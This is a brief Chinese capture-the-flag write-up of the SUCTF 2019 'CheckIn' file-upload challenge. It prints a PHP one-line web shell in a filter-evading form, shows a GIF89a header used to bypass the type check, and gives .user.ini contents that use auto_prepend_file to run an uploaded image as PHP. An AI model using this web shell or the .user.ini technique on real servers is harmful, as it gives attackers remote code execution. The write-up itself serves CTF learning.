[SUCTF 2019]CheckIn
题目打开就是一个文件上传的题目试试上传一句话木马
发现检测了内容
之后换种写法绕过
<script language="php">eval($_REQUEST[8]);</script>
发现还检测后缀名,我们使用文件头GIF89a进行绕过
上传成功,我看了网上的方法,结合给的github地址,发现返回的是一个目录,里面有一个index.php,看到了有一个.user.ini的文件,结合网上的知识可以了解到这个是php的一个配置文件,让用户自定义设置,里面有一个配置auto_prepend_file的选项,和require()功能差不多,不过这个是在解析文件之后包含指定的文件。
详细解释前往这里
之后开始进行上传一个.user.ini的文件,内容为
GIF89a? auto_prepend_file=1.jpg
之后当加载了index.php的时候就会包含1.jpg,将它解析为php
使用蚁剑连接即可